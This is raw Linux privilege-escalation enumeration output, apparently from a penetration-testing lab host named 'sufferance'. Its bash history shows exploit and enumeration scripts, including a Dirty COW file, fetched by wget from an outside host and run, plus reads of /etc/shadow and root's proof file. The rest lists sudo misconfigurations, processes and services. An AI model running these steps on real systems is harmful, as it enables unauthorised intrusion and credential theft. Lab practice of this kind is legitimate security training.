  554.  
  555.  
  556. [-] Current user's history files:
  557. -rw------- 1 bob bob 4367 2018-08-07 21:36 /home/bob/.bash_history
  558.  
  559.  
  560. [+] Root's history files are accessible!
  561. -rw------- 1 root root 35 2016-06-09 07:30 /root/.bash_history
  562.  
  563.  
  564. [-] Location and contents (if accessible) of .bash_history file(s):
  565. /home/bob/.bash_history
  566.  
  567. exit
  568. exit
  569. exit
  570. ls
  571. cd ..
  572. ls
  573. cd ..
  574. ls
  575. cd usr
  576. ls
  577. cd bin
  578. ls
  579. ls
  580. cd ..
  581. ls
  582. cd ..
  583. ls
  584. cd var
  585. ls
  586. cd bak
  587. cd backups/
  588. ls
  589. cd ..
  590. ls
  591. cd /
  592. find . -exec file {} \; | grep -i elf
  593. /bin/sh -i
  594. ls
  595. id
  596. /bin/bash
  597. ls -l
  598. strings
  599. strings vmlinuz
  600. ls
  601. cd sbin
  602. ls
  603. ls -l
  604. cd ..
  605. ls
  606. cd home
  607. cd bob
  608. ls
  609. cd files
  610. ls
  611. cat *
  612. cd ..
  613. cd ..
  614. cd ..
  615. cd tmp
  616. ls
  617. wget http://10.11.1.86:8000/linuxprivchecker.py
  618. wget http://10.11.1.86:8000/linuxprivchecker.py
  619. wget http://10.11.0.86:8000/linuxprivchecker.py
  620. python linuxprivchecker.py
  621. /bin/su
  622. /usr/bin
  623. ls
  624. cd /usr/bin
  625. ls
  626. strings at
  627. strings at
  628. strings at
  629. wget http://10.11.0.86:8000/dcow.c
  630. cd /tmp
  631. wget http://10.11.0.86:8000/dcow.c
  632. chmod +x dcow.c
  633. ./dcow.c
  634. id
  635. euid
  636. ps
  637. ps -eo pid,user,uid,args
  638. ps -eo pid,euid | grep YOUR_PID_HERE
  639. ps
  640. ps -eo pid,euid | grep 3623
  641. ps -eo pid,euid | grep 3620
  642. seteuid(0)
  643. ps -eo pid,euid | grep 3620
  644. ./dcow.c
  645. ./dcow.c
  646. ./dcow.c
  647. ./dcow.c
  648. $PATH
  649. echo $PATH
  650. echo $SHELL
  651. find / -perm -u=s -type f 2>/dev/null
  652. $PATH=/bin/su
  653. set $PATH = /bin/su
  654. echo $PATH
  655. export PATH="$PATH:/bin/su"
  656. echo $PATH
  657. whoami
  658. id
  659. ps
  660. /bin/bash
  661. ls
  662. id
  663. echo $PATH
  664. ps
  665. ps -eo pid,euid,ruid,suid | grep 375
  666. ps -eo pid,euid,ruid,suid | grep 677
  667. ps -eo pid,euid,ruid,suid | grep 3623
  668. ps -eo pid,euid,ruid,suid | grep 372
  669. sudo su
  670. /bin/su
  671. /bin.su
  672. /bin/h
  673. /bin/sh
  674. ls
  675. id
  676. whoami
  677. ps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREls
  678. ls
  679. ls -l
  680. cd vmware-root/
  681. ls
  682. strings vmware-root/
  683. /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
  684. cd /usr/lib/vmware-tools/bin32/
  685. ls
  686. ls -l
  687. strings vmware-user-suid-wrapper
  688. chmod +x vmware-user-suid-wrapper
  689. ./vmware-user-suid-wrapper
  690. id
  691. whoami
  692. uid
  693. id
  694. sudo -l
  695. sudo -s
  696. ls
  697. cd files
  698. ls
  699. cd ~
  700. ls
  701. cd ..
  702. cd ..
  703. ls
  704. cd home
  705. ls
  706. cd .ssh
  707. cd bob
  708. cd .ssj
  709. cd .ssh
  710. ls
  711. cat authorized_keys
  712. cd ..
  713. cd ..
  714. ls
  715. cd ..
  716. ls
  717. cat /etc/passwd
  718. cat /etc/shadow
  719. cd root
  720. ls
  721. cat proof.txt
  722. uname -a
  723. setuid id
  724. setuid
  725. setid
  726. access
  727. setfsuid
  728. ps -f -u user1
  729. ps -f -u bob
  730. ps -eo pid,euid,ruid,suid | grep 2174
  731. ps -eo pid,euid,ruid,suid | grep 2175
  732. ps -eo pid,euid,ruid,suid | grep 2203
  733. setuid(0)
  734. setuid() ;
  735. setuid(0)
  736. setuid('0')
  737. setuid(1001)
  738. setuid
  739. setuid() 1001
  740. setuid() -h
  741. man setuid
  742. seteuid(0)
  743. seteuid(1001)
  744. seteuid() ;
  745. seteuid(getuid())
  746. seteuid(getuid(1001))
  747. getenv("SUDO_UID")
  748. seteuid(0) /bin/bash
  749. /bin/bash
  750. $shell
  751. $ENV
  752. python
  753. pyton -c 'import pty;pty.spawn("/bin/bash")'
  754. python -c 'import pty;pty.spawn("/bin/bash")'
  755. cd /tmp
  756. ls
  757. wget http://10.11.0.86/linenu.sh
  758. wget http://10.11.0.86:8000/linenu.sh
  759. wget http://10.11.0.86:8000/linenum.sh
  760. wget http://10.11.0.86:8000/linuxprivchecker.py
  761. ls
  762. bash linenum.sh
  763. python linuxprivchecker.py
  764. wget http://10.11.0.86:8000/a.out
  765. ./a.out
  766. chmod +x a.out
  767. ./a.out
  768. id
  769. ps
  770. ps -aux
  771. ps -eo pid,euid,ruid,suid | grep 2272
  772. ps -eo pid,euid,ruid,suid | grep 2175
  773. nano a.py
  774. python a.py
  775. nano a.py
  776. python a.py
  777. nano a.py
  778. python a.py
  779. ps -eo pid,euid,ruid,suid | grep 2175
  780. sudo
  781. sudo -h
  782. sudo --help
  783. sudo -l
  784. nano a.py
  785. python a.py
  786. nano a.py
  787. python a.py
  788. ps -eo pid,euid,ruid,suid | grep 2175
  789. ps
  790. ps -eo pid,euid,ruid,suid | grep 2760
  791. ps -eo pid,euid,ruid,suid | grep 2893
  792. ps
  793. /bin/bash
  794. /bin/sh
  795. ls
  796. python a.py
  797. ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
  798. lsps -efl | grep 'sleep 1' | grep -v gre
  799. ps -efl | grep 'sleep 1' | grep -v gre
  800. ps -efl | grep 'sleep 1' | grep -v grep
  801. ps -efl | grep 'sleep 1' | grep -v grep
  802. ps -efl | grep 'sleep 1' | grep -v grep
  803. ps -efl | grep 'sleep 1' | grep -v grep
  804. ps -efl | grep 'sleep 1' | grep -v grep
  805. ps -efl | grep 'sleep 1' | grep -v grep
  806. ps -efl | grep 'sleep 1' | grep -v grep
  807. ps -efl | grep 'sleep 1' | grep -v grep
  808. ps -efl | grep 'sleep 1' | grep -v
  809. ps -efl | grep 'sleep 1'
  810. ps -efl | grep 'sleep 1'
  811. python a.p
  812. python a.py
  813. ls /proc
  814. cd 2893
  815. ls
  816. ls /proc/2893
  817. ls /proc/2893/fd
  818. ls /proc/2893/fd/1
  819. ls /proc/2893/fd/1
  820. cat /proc/2893/fd/1
  821. echo n> /proc/2893/fd/1
  822. echo n >/proc/2893/fd/1
  823. cat /proc/2893/fd/1
  824. echo n >/proc/2893/fd/1
  825. loc
  826. ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }
  827. ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
  828. ps -efl | grep 'sleep 1' | grep -v grep
  829. ps -efl | grep 'sleep 1' | grep -v grep|cut -d " " -f 4
  830. ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $3'}
  831. ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $4'}
  832. python a.py
  833. python a.py
  834. nano a.py
  835. python a.py
  836. nano a.py
  837. python a.py
  838. nano a.py
  839. python a.py
  840. nano a.py
  841. python a.py
  842. nano a.py
  843. whoami
  844. id
  845. ps aux
  846. /bin/sh
  847. ls
  848. whoami
  849. id
  850. /bin/bash
  851.  
  852.  
  853. [-] Any interesting mail in /var/mail:
  854. total 8
  855. drwxrwsr-x 2 root mail 4096 2007-09-05 19:45 .
  856. drwxr-xr-x 13 root root 4096 2007-09-05 19:45 ..
  857.  
  858.  
  859. ### SCAN COMPLETE ####################################
  860.  
  861. #########################################################
  862. # Local Linux Enumeration & Privilege Escalation Script #
  863. #########################################################
  864. # www.rebootuser.com
  865. # version 0.91
  866.  
  867. [-] Debug Info
  868. [+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)
  869.  
  870.  
  871. Scan started at:
  872. Wed Aug 8 03:56:00 EDT 2018
  873.  
  874.  
  875. ### SYSTEM ##############################################
  876. [-] Kernel information:
  877. Linux sufferance 2.6.30.5-ph33r #1 SMP Sat Aug 29 16:20:59 EDT 2009 i686 GNU/Linux
  878.  
  879.  
  880. [-] Kernel information (continued):
  881. Linux version 2.6.30.5-ph33r (root@sufference) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #1 SMP Sat Aug 29 16:20:59 EDT 2009
  882.  
  883.  
  884. [-] Hostname:
  885. sufferance
  886.  
  887.  
  888. ### USER/GROUP ##########################################
  889. [-] Current user/group info:
  890. uid=1001(bob) gid=1001(bob) groups=1001(bob)
  891.  
  892.  
  893. [-] Users that have previously logged onto the system:
  894. Username Port From Latest
  895. root tty1 Thu Jun 9 07:30:24 -0400 2016
  896. bob pts/1 10.11.0.86 Wed Aug 8 03:21:49 -0400 2018
  897.  
  898.  
  899. [-] Who else is logged on:
  900. 03:56:00 up 9:27, 2 users, load average: 0.00, 0.00, 0.00
  901. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  902. bob pts/0 10.11.0.86 03:14 37:04m 0.00s 0.00s -bash
  903. bob pts/1 10.11.0.86 03:21 5.00s 0.05s 0.04s bash linenum.sh
  904.  
  905.  
  906. [-] Group memberships:
  907. uid=0(root) gid=0(root) groups=0(root)
  908. uid=1(daemon) gid=1(daemon) groups=1(daemon)
  909. uid=2(bin) gid=2(bin) groups=2(bin)
  910. uid=3(sys) gid=3(sys) groups=3(sys)
  911. uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
  912. uid=5(games) gid=60(games) groups=60(games)
  913. uid=6(man) gid=12(man) groups=12(man)
  914. uid=7(lp) gid=7(lp) groups=7(lp)
  915. uid=8(mail) gid=8(mail) groups=8(mail)
  916. uid=9(news) gid=9(news) groups=9(news)
  917. uid=10(uucp) gid=10(uucp) groups=10(uucp)
  918. uid=13(proxy) gid=13(proxy) groups=13(proxy)
  919. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  920. uid=34(backup) gid=34(backup) groups=34(backup)
  921. uid=38(list) gid=38(list) groups=38(list)
  922. uid=39(irc) gid=39(irc) groups=39(irc)
  923. uid=41(gnats) gid=41(gnats) groups=41(gnats)
  924. uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
  925. uid=100(Debian-exim) gid=102(Debian-exim) groups=102(Debian-exim)
  926. uid=101(statd) gid=65534(nogroup) groups=65534(nogroup)
  927. uid=102(identd) gid=65534(nogroup) groups=65534(nogroup)
  928. uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)
  929. uid=1001(bob) gid=1001(bob) groups=1001(bob)
  930.  
  931.  
  932. [-] Contents of /etc/passwd:
  933. root:x:0:0:root:/root:/bin/bash
  934. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  935. bin:x:2:2:bin:/bin:/bin/sh
  936. sys:x:3:3:sys:/dev:/bin/sh
  937. sync:x:4:65534:sync:/bin:/bin/sync
  938. games:x:5:60:games:/usr/games:/bin/sh
  939. man:x:6:12:man:/var/cache/man:/bin/sh
  940. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  941. mail:x:8:8:mail:/var/mail:/bin/sh
  942. news:x:9:9:news:/var/spool/news:/bin/sh
  943. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  944. proxy:x:13:13:proxy:/bin:/bin/sh
  945. www-data:x:33:33:www-data:/var/www:/bin/sh
  946. backup:x:34:34:backup:/var/backups:/bin/sh
  947. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  948. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  949. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  950. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  951. Debian-exim:x:100:102::/var/spool/exim4:/bin/false
  952. statd:x:101:65534::/var/lib/nfs:/bin/false
  953. identd:x:102:65534::/var/run/identd:/bin/false
  954. sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
  955. bob:x:1001:1001::/home/bob:/bin/bash
  956.  
  957.  
  958. [-] Super user account(s):
  959. root
  960.  
  961.  
  962. [+] We can sudo without supplying a password!
  963. usage: sudo [-HPSb] [-p prompt] [-u username|#uid]
  964. { -e file [...] | -i | -s | <command> }
  965.  
  966.  
  967. [+] We can read root's home directory!
  968. total 36K
  969. drwxr-xr-x 4 root root 4.0K 2016-06-09 07:29 .
  970. drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
  971. drwx------ 2 root root 4.0K 2007-09-05 19:55 .aptitude
  972. -rw------- 1 root root 35 2016-06-09 07:30 .bash_history
  973. -rw-r--r-- 1 root root 633 2016-04-19 03:53 .bashrc
  974. -rw-r--r-- 1 root root 110 2004-11-10 11:10 .profile
  975. ---------- 1 root root 33 2015-02-27 19:33 proof.txt
  976. drwx------ 2 root root 4.0K 2011-01-29 13:07 .ssh
  977. -rw------- 1 root root 1 2016-04-19 03:52 .viminfo
  978.  
  979.  
  980. [-] Are permissions on /home directories lax:
  981. total 12K
  982. drwxr-xr-x 3 root root 4.0K 2008-10-05 19:21 .
  983. drwxr-xr-x 22 root root 4.0K 2009-08-26 05:54 ..
  984. drwxr-xr-x 4 bob 1000 4.0K 2011-01-29 13:07 bob
  985.  
  986.  
  987. [-] Root is allowed to login via SSH:
  988. PermitRootLogin yes
  989.  
  990.  
  991. ### ENVIRONMENTAL #######################################
  992. [-] Environment information:
  993. SHELL=/bin/bash
  994. TERM=xterm-256color
  995. SSH_CLIENT=10.11.0.86 44278 22
  996. SSH_TTY=/dev/pts/1
  997. USER=bob
  998. PATH=/usr/local/bin:/usr/bin:/bin:/usr/games
  999. MAIL=/var/mail/bob
  1000. PWD=/tmp
  1001. LANG=en_US.UTF-8
  1002. HOME=/home/bob
  1003. SHLVL=2
  1004. LOGNAME=bob
  1005. SSH_CONNECTION=10.11.0.86 44278 10.11.1.136 22
  1006. _=/usr/bin/env
  1007.  
  1008.  
  1009. [-] Path information:
  1010. /usr/local/bin:/usr/bin:/bin:/usr/games
  1011.  
  1012.  
  1013. [-] Available shells:
  1014. # /etc/shells: valid login shells
  1015. /bin/csh
  1016. /bin/sh
  1017. /usr/bin/es
  1018. /usr/bin/ksh
  1019. /bin/ksh
  1020. /usr/bin/rc
  1021. /usr/bin/tcsh
  1022. /bin/tcsh
  1023. /usr/bin/esh
  1024. /bin/bash
  1025. /bin/rbash
  1026.  
  1027.  
  1028. [-] Current umask value:
  1029. u=rwx,g=rx,o=rx
  1030. 0022
  1031.  
  1032.  
  1033. [-] Password and storage information:
  1034. PASS_MAX_DAYS 99999
  1035. PASS_MIN_DAYS 0
  1036. PASS_WARN_AGE 7
  1037.  
  1038.  
  1039. ### JOBS/TASKS ##########################################
  1040. [-] Cron jobs:
  1041. -rw-r--r-- 1 root root 724 2006-12-19 19:02 /etc/crontab
  1042.  
  1043. /etc/cron.d:
  1044. total 12
  1045. drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
  1046. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  1047. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  1048.  
  1049. /etc/cron.daily:
  1050. total 56
  1051. drwxr-xr-x 2 root root 4096 2008-10-07 16:41 .
  1052. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  1053. -rwxr-xr-x 1 root root 5041 2007-02-26 16:21 apt
  1054. -rwxr-xr-x 1 root root 314 2007-03-14 10:11 aptitude
  1055. -rwxr-xr-x 1 root root 502 2007-01-02 12:26 bsdmainutils
  1056. -rwxr-xr-x 1 root root 3961 2007-01-20 04:46 exim4-base
  1057. -rwxr-xr-x 1 root root 419 2006-08-06 04:12 find
  1058. -rwxr-xr-x 1 root root 89 2006-04-08 18:16 logrotate
  1059. -rwxr-xr-x 1 root root 946 2007-01-29 07:20 man-db
  1060. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  1061. -rwxr-xr-x 1 root root 383 2008-05-29 06:21 samba
  1062. -rwxr-xr-x 1 root root 3283 2006-12-19 19:02 standard
  1063. -rwxr-xr-x 1 root root 1307 2006-05-25 05:38 sysklogd
  1064.  
  1065. /etc/cron.hourly:
  1066. total 12
  1067. drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
  1068. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  1069. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  1070.  
  1071. /etc/cron.monthly:
  1072. total 16
  1073. drwxr-xr-x 2 root root 4096 2007-09-05 19:48 .
  1074. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  1075. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  1076. -rwxr-xr-x 1 root root 129 2006-12-19 19:02 standard
  1077.  
  1078. /etc/cron.weekly:
  1079. total 20
  1080. drwxr-xr-x 2 root root 4096 2007-09-05 19:54 .
  1081. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  1082. -rwxr-xr-x 1 root root 520 2007-01-29 07:20 man-db
  1083. -rw-r--r-- 1 root root 102 2006-12-19 19:02 .placeholder
  1084. -rwxr-xr-x 1 root root 1092 2006-05-25 05:38 sysklogd
  1085.  
  1086.  
  1087. [-] Crontab contents:
  1088. # /etc/crontab: system-wide crontab
  1089. # Unlike any other crontab you don't have to run the `crontab'
  1090. # command to install the new version when you edit this file
  1091. # and files in /etc/cron.d. These files also have username fields,
  1092. # that none of the other crontabs do.
  1093.  
  1094. SHELL=/bin/sh
  1095. PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
  1096.  
  1097. # m h dom mon dow user command
  1098. 17 * * * * root cd / && run-parts --report /etc/cron.hourly
  1099. 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
  1100. 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
  1101. 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
  1102. #
  1103.  
  1104.  
  1105. ### NETWORKING ##########################################
  1106. [-] Network and IP info:
  1107. eth0 Link encap:Ethernet HWaddr 00:50:56:B8:8E:C5
  1108. inet addr:10.11.1.136 Bcast:10.11.255.255 Mask:255.255.0.0
  1109. inet6 addr: fe80::250:56ff:feb8:8ec5/64 Scope:Link
  1110. UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
  1111. RX packets:81969 errors:2 dropped:4 overruns:0 frame:0
  1112. TX packets:28019 errors:0 dropped:0 overruns:0 carrier:0
  1113. collisions:0 txqueuelen:1000
  1114. RX bytes:7185584 (6.8 MiB) TX bytes:5028079 (4.7 MiB)
  1115. Interrupt:18 Base address:0x2000
  1116.  
  1117. lo Link encap:Local Loopback
  1118. inet addr:127.0.0.1 Mask:255.0.0.0
  1119. inet6 addr: ::1/128 Scope:Host
  1120. UP LOOPBACK RUNNING MTU:16436 Metric:1
  1121. RX packets:18 errors:0 dropped:0 overruns:0 frame:0
  1122. TX packets:18 errors:0 dropped:0 overruns:0 carrier:0
  1123. collisions:0 txqueuelen:0
  1124. RX bytes:1572 (1.5 KiB) TX bytes:1572 (1.5 KiB)
  1125.  
  1126.  
  1127. [-] Nameserver(s):
  1128. nameserver 10.11.1.220
  1129. nameserver 10.11.1.221
  1130.  
  1131.  
  1132. [-] Listening TCP:
  1133. Active Internet connections (servers and established)
  1134. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  1135. tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
  1136. tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN -
  1137. tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
  1138. tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
  1139. tcp 0 0 10.11.1.136:445 10.11.0.60:60674 ESTABLISHED-
  1140. tcp6 0 0 :::22 :::* LISTEN -
  1141. tcp6 0 1212 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44278 ESTABLISHED-
  1142. tcp6 0 0 ::ffff:10.11.1.136:22 ::ffff:10.11.0.86:44154 ESTABLISHED-
  1143.  
  1144.  
  1145. [-] Listening UDP:
  1146. Active Internet connections (servers and established)
  1147. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  1148. udp 0 0 10.11.1.136:137 0.0.0.0:* -
  1149. udp 0 0 0.0.0.0:137 0.0.0.0:* -
  1150. udp 0 0 10.11.1.136:138 0.0.0.0:* -
  1151. udp 0 0 0.0.0.0:138 0.0.0.0:* -
  1152.  
  1153.  
  1154. ### SERVICES #############################################
  1155. [-] Running processes:
  1156. USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
  1157. root 1 0.0 0.0 1940 640 ? Ss Aug07 0:01 init [2]
  1158. root 2 0.0 0.0 0 0 ? S< Aug07 0:00 [kthreadd]
  1159. root 3 0.0 0.0 0 0 ? S< Aug07 0:00 [migration/0]
  1160. root 4 0.0 0.0 0 0 ? S< Aug07 0:00 [ksoftirqd/0]
  1161. root 5 0.0 0.0 0 0 ? S< Aug07 0:00 [watchdog/0]
  1162. root 6 0.0 0.0 0 0 ? S< Aug07 0:00 [events/0]
  1163. root 7 0.0 0.0 0 0 ? S< Aug07 0:00 [cpuset]
  1164. root 8 0.0 0.0 0 0 ? S< Aug07 0:00 [khelper]
  1165. root 13 0.0 0.0 0 0 ? S< Aug07 0:00 [async/mgr]
  1166. root 60 0.0 0.0 0 0 ? S< Aug07 0:00 [kblockd/0]
  1167. root 62 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpid]
  1168. root 63 0.0 0.0 0 0 ? S< Aug07 0:00 [kacpi_notify]
  1169. root 174 0.0 0.0 0 0 ? S< Aug07 0:00 [kseriod]
  1170. root 224 0.0 0.0 0 0 ? S Aug07 0:00 [khungtaskd]
  1171. root 225 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
  1172. root 226 0.0 0.0 0 0 ? S Aug07 0:00 [pdflush]
  1173. root 227 0.0 0.0 0 0 ? S< Aug07 0:00 [kswapd0]
  1174. root 228 0.0 0.0 0 0 ? S< Aug07 0:00 [aio/0]
  1175. root 229 0.0 0.0 0 0 ? S< Aug07 0:00 [crypto/0]
  1176. bob 705 0.2 0.3 19220 3176 ? S Aug07 1:17 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
  1177. bob 736 0.0 0.3 19220 3176 ? S Aug07 0:27 /usr/lib/vmware-tools/sbin32/vmtoolsd -n vmusr
  1178. root 787 0.0 0.0 0 0 ? S< Aug07 0:00 [ata/0]
  1179. root 809 0.0 0.0 0 0 ? S< Aug07 0:00 [ata_aux]
  1180. root 810 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_0]
  1181. root 811 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_1]
  1182. root 954 0.0 0.0 0 0 ? S< Aug07 0:00 [mpt_poll_0]
  1183. root 970 0.0 0.0 0 0 ? S< Aug07 0:00 [scsi_eh_2]
  1184. root 1183 0.0 0.2 7668 2224 ? Ss 03:14 0:00 sshd: bob [priv]
  1185. bob 1185 0.0 0.1 7668 1560 ? S 03:14 0:00 sshd: bob@pts/0
  1186. bob 1186 0.0 0.1 4484 1972 pts/0 Ss+ 03:14 0:00 -bash
  1187. root 1194 0.0 0.2 9340 2936 ? S 03:18 0:00 /usr/sbin/smbd -D
  1188. root 1201 0.0 0.0 0 0 ? S< Aug07 0:00 [kjournald]
  1189. root 1482 0.0 0.0 0 0 ? S< Aug07 0:00 [kstriped]
  1190. root 1485 0.0 0.0 0 0 ? S< Aug07 0:00 [ksnapd]
  1191. root 1650 0.0 0.3 33948 3888 ? Sl Aug07 0:22 /usr/sbin/vmtoolsd
  1192. root 1864 0.0 0.0 1620 616 ? Ss Aug07 0:00 /sbin/syslogd
  1193. root 1870 0.0 0.0 1572 372 ? Ss Aug07 0:00 /sbin/klogd -x
  1194. root 1923 0.0 0.2 7668 2220 ? Ss 03:21 0:00 sshd: bob [priv]
  1195. root 1924 0.0 0.0 1568 560 ? Ss Aug07 0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
  1196. bob 1926 0.0 0.1 7828 1568 ? S 03:21 0:00 sshd: bob@pts/1
  1197. bob 1927 0.0 0.1 4476 1924 pts/1 Ss 03:21 0:00 -bash
  1198. 100 1967 0.0 0.0 5308 996 ? Ss Aug07 0:00 /usr/sbin/exim4 -bd -q30m
  1199. root 1981 0.0 0.0 1744 568 ? Ss Aug07 0:00 /usr/sbin/inetd
  1200. root 1988 0.0 0.1 5884 1388 ? Ss Aug07 0:01 /usr/sbin/nmbd -D
  1201. root 1990 0.0 0.2 9052 2532 ? Ss Aug07 0:00 /usr/sbin/smbd -D
  1202. root 1999 0.0 0.1 9052 1092 ? S Aug07 0:00 /usr/sbin/smbd -D
  1203. root 2003 0.0 0.1 4920 1088 ? Ss Aug07 0:00 /usr/sbin/sshd
  1204. root 2030 0.0 0.0 0 0 ? S< Aug07 0:00 [rpciod/0]
  1205. root 2031 0.0 0.0 0 0 ? S< Aug07 0:00 [nfsiod]
  1206. root 2037 0.0 0.0 3504 516 ? Ss Aug07 0:00 /usr/sbin/rpc.idmapd
  1207. daemon 2047 0.0 0.0 1824 408 ? Ss Aug07 0:00 /usr/sbin/atd
  1208. root 2054 0.0 0.0 2188 760 ? Ss Aug07 0:00 /usr/sbin/cron
  1209. root 2087 0.0 0.0 1568 492 tty1 Ss+ Aug07 0:00 /sbin/getty 38400 tty1
  1210. root 2088 0.0 0.0 1568 492 tty2 Ss+ Aug07 0:00 /sbin/getty 38400 tty2
  1211. root 2089 0.0 0.0 1568 488 tty3 Ss+ Aug07 0:00 /sbin/getty 38400 tty3
  1212. root 2090 0.0 0.0 1568 492 tty4 Ss+ Aug07 0:00 /sbin/getty 38400 tty4
  1213. root 2091 0.0 0.0 1568 488 tty5 Ss+ Aug07 0:00 /sbin/getty 38400 tty5
  1214. root 2092 0.0 0.0 1568 488 tty6 Ss+ Aug07 0:00 /sbin/getty 38400 tty6
  1215. bob 2104 0.8 0.2 4900 2204 pts/1 S+ 03:55 0:00 bash linenum.sh
  1216. bob 2464 1.0 0.1 4916 1840 pts/1 R+ 03:55 0:00 bash linenum.sh
  1217. bob 2466 0.0 0.0 2744 504 pts/1 S+ 03:55 0:00 tee -a
  1218. bob 2645 0.0 0.1 4916 1604 pts/1 R+ 03:56 0:00 bash linenum.sh
  1219. bob 2646 0.0 0.0 3424 980 pts/1 R+ 03:56 0:00 ps aux
  1220.  
  1221.  
  1222. [-] Process binaries and associated permissions (from above list):
  1223. 16K -rwxr-xr-x 1 root root 15K 2007-02-21 12:48 /sbin/getty
  1224. 24K -rwxr-xr-x 1 root root 23K 2006-05-25 05:38 /sbin/klogd
  1225. 28K -rwxr-xr-x 1 root root 28K 2006-05-25 05:38 /sbin/syslogd
  1226. 696K -rwxr-xr-x 2 root root 689K 2015-02-27 19:06 /usr/lib/vmware-tools/sbin32/vmtoolsd
  1227. 20K -rwxr-xr-x 1 root root 18K 2006-01-15 16:24 /usr/sbin/acpid
  1228. 16K -rwxr-xr-x 1 root root 16K 2006-01-03 02:15 /usr/sbin/atd
  1229. 32K -rwxr-xr-x 1 root root 31K 2006-12-19 19:02 /usr/sbin/cron
  1230. 676K -rwsr-xr-x 1 root root 672K 2007-01-20 04:46 /usr/sbin/exim4
  1231. 32K -rwxr-xr-x 1 root root 29K 2007-03-21 14:12 /usr/sbin/inetd
  1232. 900K -rwxr-xr-x 1 root root 893K 2008-05-29 06:21 /usr/sbin/nmbd
  1233. 36K -rwxr-xr-x 1 root root 35K 2007-05-16 06:41 /usr/sbin/rpc.idmapd
  1234. 3.1M -rwxr-xr-x 1 root root 3.1M 2008-05-29 06:21 /usr/sbin/smbd
  1235. 316K -rwxr-xr-x 1 root root 312K 2007-03-05 11:38 /usr/sbin/sshd
  1236. 0 lrwxrwxrwx 1 root root 37 2015-02-27 19:06 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
  1237.  
  1238.  
  1239. [-] Contents of /etc/inetd.conf:
  1240. # /etc/inetd.conf: see inetd(8) for further informations.
  1241. #
  1242. # Internet superserver configuration database
  1243. #
  1244. #
  1245. # Lines starting with "#:LABEL:" or "#<off>#" should not
  1246. # be changed unless you know what you are doing!
  1247. #
  1248. # If you want to disable an entry so it isn't touched during
  1249. # package updates just comment it out with a single '#' character.
  1250. #
  1251. # Packages should modify this file by using update-inetd(8)
  1252. #
  1253. # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
  1254. #
  1255. #:INTERNAL: Internal services
  1256. #discard stream tcp nowait root internal
  1257. #discard dgram udp wait root internal
  1258. #daytime stream tcp nowait root internal
  1259. #time stream tcp nowait root internal
  1260.  
  1261. #:STANDARD: These are standard services.
  1262.  
  1263. #:BSD: Shell, login, exec and talk are BSD protocols.
  1264.  
  1265. #:MAIL: Mail, news and uucp services.
  1266.  
  1267. #:INFO: Info services
  1268. ident stream tcp wait identd /usr/sbin/identd identd
  1269.  
  1270. #:BOOT: TFTP service is provided primarily for booting. Most sites
  1271. # run this only on machines acting as "boot servers."
  1272.  
  1273. #:RPC: RPC based services
  1274.  
  1275. #:HAM-RADIO: amateur-radio services
  1276.  
  1277. #:OTHER: Other services
  1278. #<off># netbios-ssn stream tcp nowait root /usr/sbin/tcpd /usr/sbin/smbd
  1279.  
  1280.  
  1281. [-] The related inetd binary permissions:
  1282. -rwxr-xr-x 1 root root 4280 2007-02-25 15:06 /usr/sbin/tcpd
  1283.  
  1284.  
